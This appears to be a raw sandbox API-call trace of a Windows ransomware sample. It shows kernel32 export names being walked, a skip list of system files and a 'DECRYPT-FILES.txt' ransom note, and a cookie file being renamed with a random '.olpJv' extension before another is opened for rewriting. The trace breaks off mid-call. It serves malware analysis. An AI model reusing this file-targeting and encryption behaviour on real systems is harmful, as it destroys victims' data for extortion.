[0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0079.666] lstrlenA (lpString="CREATEJOBSET") returned 12 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0079.666] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0079.666] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0079.666] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0079.666] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0079.666] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0079.666] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0079.666] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0079.666] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0079.666] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0079.666] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0079.666] lstrlenA (lpString="CREATEPIPE") returned 10 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0079.667] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0079.667] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0079.667] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0079.667] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0079.667] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0079.667] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0079.667] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0079.667] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0079.667] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0079.667] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0079.667] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0079.667] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0079.667] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0079.667] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0079.667] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0079.667] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0079.667] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0079.667] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0079.668] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0079.668] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0079.668] lstrlenA (lpString="CREATETHREAD") returned 12 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0079.668] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0079.668] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0079.668] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0079.668] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0079.668] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0079.668] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.668] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.668] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.668] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.668] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.668] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.668] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.668] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.668] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.668] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.669] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.669] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.669] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.669] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.669] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.669] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.669] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.669] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.669] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.669] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.669] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.669] lstrlenA (lpString="DELETEATOM") returned 10 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.669] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.669] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.669] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.669] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.669] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.669] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.669] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.670] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.670] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.670] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.670] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.670] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.670] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.670] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.670] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.670] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.670] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.670] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.670] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.670] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.670] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.670] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.670] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.670] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.670] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.670] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.671] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.671] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.671] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.671] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.671] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.671] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.671] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.671] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.671] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.671] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.671] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.671] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.671] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.671] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.671] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.671] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.671] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.672] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.672] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt") returned 112 [0079.672] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv") returned 118 [0079.672] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpJv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.bing[2].txt.olpjv"), dwFlags=0x0) returned 1 [0079.673] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.673] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.673] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.674] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54d8c7b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54d8c7b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54d8c7b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", cAlternateFileName="5PC3D9~1.TXT")) returned 1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="autorun.inf") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="boot.ini") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="desktop.ini") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="ntuser.dat") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="iconcache.db") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="bootsect.bak") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="thumbs.db") returned -1 [0079.674] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt", lpString2="Bootfont.bin") returned -1 [0079.674] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt") returned 40 [0079.674] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.674] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.674] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.674] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.674] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.674] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt") returned 40 [0079.674] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.674] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" [0079.674] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.675] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.linkedin[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.675] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=169) returned 1 [0079.675] CreateFileMappingW (hFile=0x460, 